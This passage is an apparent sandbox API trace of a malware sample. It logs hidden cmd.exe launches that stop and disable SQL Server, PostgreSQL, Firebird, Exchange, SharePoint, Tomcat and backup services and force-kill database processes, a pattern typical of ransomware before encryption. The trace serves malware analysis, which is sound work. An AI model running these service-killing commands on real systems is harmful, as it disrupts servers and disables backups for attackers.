lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xddc, dwThreadId=0xde0)) returned 1 [0110.195] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0111.167] CloseHandle (hObject=0x1f4) returned 1 [0111.167] CloseHandle (hObject=0x1f0) returned 1 [0111.167] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0111.167] _mbscat (in: param_1=0x29fb50, param_2=0x28853d8 | out: param_1=0x29fb50) returned 0x29fb50 [0111.167] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xe18, dwThreadId=0xe1c)) returned 1 [0111.174] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0112.350] CloseHandle (hObject=0x1f4) returned 1 [0112.350] CloseHandle (hObject=0x1f0) returned 1 [0112.351] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0112.351] _mbscat (in: param_1=0x29fb50, param_2=0x2885840 | out: param_1=0x29fb50) returned 0x29fb50 [0112.351] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xe6c, dwThreadId=0xe70)) returned 1 [0112.358] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0113.360] CloseHandle (hObject=0x1f4) returned 1 [0113.360] CloseHandle (hObject=0x1f0) returned 1 [0113.360] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0113.360] _mbscat (in: param_1=0x29fb50, param_2=0x2885c30 | out: param_1=0x29fb50) returned 0x29fb50 [0113.360] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xeb0, dwThreadId=0xeb4)) returned 1 [0113.368] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0114.419] CloseHandle (hObject=0x1f4) returned 1 [0114.419] CloseHandle (hObject=0x1f0) returned 1 [0114.419] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0114.419] _mbscat (in: param_1=0x29fb50, param_2=0x2885c88 | out: param_1=0x29fb50) returned 0x29fb50 [0114.419] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xeec, dwThreadId=0xef0)) returned 1 [0114.426] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0115.394] CloseHandle (hObject=0x1f4) returned 1 [0115.394] CloseHandle (hObject=0x1f0) returned 1 [0115.394] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0115.394] _mbscat (in: param_1=0x29fb50, param_2=0x2885208 | out: param_1=0x29fb50) returned 0x29fb50 [0115.394] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xf20, dwThreadId=0xf24)) returned 1 [0115.404] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0116.316] CloseHandle (hObject=0x1f4) returned 1 [0116.316] CloseHandle (hObject=0x1f0) returned 1 [0116.316] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0116.316] _mbscat (in: param_1=0x29fb50, param_2=0x2885260 | out: param_1=0x29fb50) returned 0x29fb50 [0116.316] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xf54, dwThreadId=0xf58)) returned 1 [0116.323] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0117.377] CloseHandle (hObject=0x1f4) returned 1 [0117.377] CloseHandle (hObject=0x1f0) returned 1 [0117.377] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0117.377] _mbscat (in: param_1=0x29fb50, param_2=0x28852b8 | out: param_1=0x29fb50) returned 0x29fb50 [0117.377] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xf88, dwThreadId=0xf8c)) returned 1 [0117.385] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0118.318] CloseHandle (hObject=0x1f4) returned 1 [0118.318] CloseHandle (hObject=0x1f0) returned 1 [0118.318] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0118.318] _mbscat (in: param_1=0x29fb50, param_2=0x2885310 | out: param_1=0x29fb50) returned 0x29fb50 [0118.318] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xfbc, dwThreadId=0xfc0)) returned 1 [0118.325] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0119.330] CloseHandle (hObject=0x1f4) returned 1 [0119.330] CloseHandle (hObject=0x1f0) returned 1 [0119.331] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0119.331] _mbscat (in: param_1=0x29fb50, param_2=0x2885fe8 | out: param_1=0x29fb50) returned 0x29fb50 [0119.331] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xff0, dwThreadId=0xff4)) returned 1 [0119.338] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0120.270] CloseHandle (hObject=0x1f4) returned 1 [0120.270] CloseHandle (hObject=0x1f0) returned 1 [0120.270] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0120.270] _mbscat (in: param_1=0x29fb50, param_2=0x2886040 | out: param_1=0x29fb50) returned 0x29fb50 [0120.270] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xc38, dwThreadId=0xc24)) returned 1 [0120.277] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0121.198] CloseHandle (hObject=0x1f4) returned 1 [0121.198] CloseHandle (hObject=0x1f0) returned 1 [0121.198] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0121.198] _mbscat (in: param_1=0x29fb50, param_2=0x2886098 | out: param_1=0x29fb50) returned 0x29fb50 [0121.198] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xc44, dwThreadId=0x554)) returned 1 [0121.205] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0123.372] CloseHandle (hObject=0x1f4) returned 1 [0123.372] CloseHandle (hObject=0x1f0) returned 1 [0123.372] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0123.372] _mbscat (in: param_1=0x29fb50, param_2=0x2886538 | out: param_1=0x29fb50) returned 0x29fb50 [0123.372] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xc6c, dwThreadId=0xc7c)) returned 1 [0123.379] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0124.603] CloseHandle (hObject=0x1f4) returned 1 [0124.603] CloseHandle (hObject=0x1f0) returned 1 [0124.603] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0124.603] _mbscat (in: param_1=0x29fb50, param_2=0x2883628 | out: param_1=0x29fb50) returned 0x29fb50 [0124.603] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config FirebirdServerDefaultInstance start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config FirebirdServerDefaultInstance start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xcc8, dwThreadId=0xcd0)) returned 1 [0124.609] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0125.022] CloseHandle (hObject=0x1f4) returned 1 [0125.022] CloseHandle (hObject=0x1f0) returned 1 [0125.022] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0125.022] _mbscat (in: param_1=0x29fb50, param_2=0x28819b8 | out: param_1=0x29fb50) returned 0x29fb50 [0125.022] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c taskkill \\/IM fb_inet_server.exe \\/F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c taskkill \\/IM fb_inet_server.exe \\/F", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xd48, dwThreadId=0xd44)) returned 1 [0125.029] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0125.662] CloseHandle (hObject=0x1f4) returned 1 [0125.662] CloseHandle (hObject=0x1f0) returned 1 [0125.662] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0125.662] _mbscat (in: param_1=0x29fb50, param_2=0x28817a8 | out: param_1=0x29fb50) returned 0x29fb50 [0125.662] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop FirebirdServerDefaultInstance", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop FirebirdServerDefaultInstance", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0x300, dwThreadId=0xb4c)) returned 1 [0125.670] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0126.805] CloseHandle (hObject=0x1f4) returned 1 [0126.805] CloseHandle (hObject=0x1f0) returned 1 [0126.805] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0126.805] _mbscat (in: param_1=0x29fb50, param_2=0x60ecf8 | out: param_1=0x29fb50) returned 0x29fb50 [0126.806] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c taskkill \\/IM sqlservr.exe \\/F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c taskkill \\/IM sqlservr.exe \\/F", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xd7c, dwThreadId=0xd74)) returned 1 [0126.813] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0127.104] CloseHandle (hObject=0x1f4) returned 1 [0127.104] CloseHandle (hObject=0x1f0) returned 1 [0127.104] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0127.104] _mbscat (in: param_1=0x29fb50, param_2=0x28818c8 | out: param_1=0x29fb50) returned 0x29fb50 [0127.104] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSSQLSERVER start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSSQLSERVER start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xdd4, dwThreadId=0xdd0)) returned 1 [0127.111] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0127.481] CloseHandle (hObject=0x1f4) returned 1 [0127.481] CloseHandle (hObject=0x1f0) returned 1 [0127.481] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0127.481] _mbscat (in: param_1=0x29fb50, param_2=0x2882f48 | out: param_1=0x29fb50) returned 0x29fb50 [0127.481] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSSQL$SQLEXPRESS start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSSQL$SQLEXPRESS start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xdb0, dwThreadId=0xda8)) returned 1 [0127.488] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0127.701] CloseHandle (hObject=0x1f4) returned 1 [0127.701] CloseHandle (hObject=0x1f0) returned 1 [0127.701] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0127.701] _mbscat (in: param_1=0x29fb50, param_2=0x2882208 | out: param_1=0x29fb50) returned 0x29fb50 [0127.702] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSSQLSERVER", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSSQLSERVER", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xd18, dwThreadId=0xd34)) returned 1 [0127.708] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0127.997] CloseHandle (hObject=0x1f4) returned 1 [0127.997] CloseHandle (hObject=0x1f0) returned 1 [0127.997] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0127.997] _mbscat (in: param_1=0x29fb50, param_2=0x60edc0 | out: param_1=0x29fb50) returned 0x29fb50 [0127.997] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSSQL$SQLEXPRESS", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, 